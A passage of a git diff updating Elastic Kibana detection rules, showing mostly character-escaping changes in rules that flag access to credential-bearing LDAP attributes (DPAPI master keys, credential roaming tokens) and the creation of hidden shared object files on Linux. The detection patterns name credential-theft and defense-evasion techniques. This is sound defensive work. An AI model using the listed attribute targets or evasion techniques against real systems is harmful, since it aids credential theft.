"https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json index bb949352bd9..68ac8b899af 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json index 321b489e39b..309300132d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json index f0b39863788..27ea8045fbe 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66", - "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json index 9de296eec2f..d82a9cb624b 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json index a356f7946ad..7c094fea97c 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json index 227fc6878d4..83321719a4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json index d076b8c3a9e..321ca0ed462 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Creation of Hidden Shared Object File", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\"\n", "related_integrations": [ { @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json index d899faf447a..ddbfbda74ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json index f6de83ceb7c..00c6cfe5be3 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 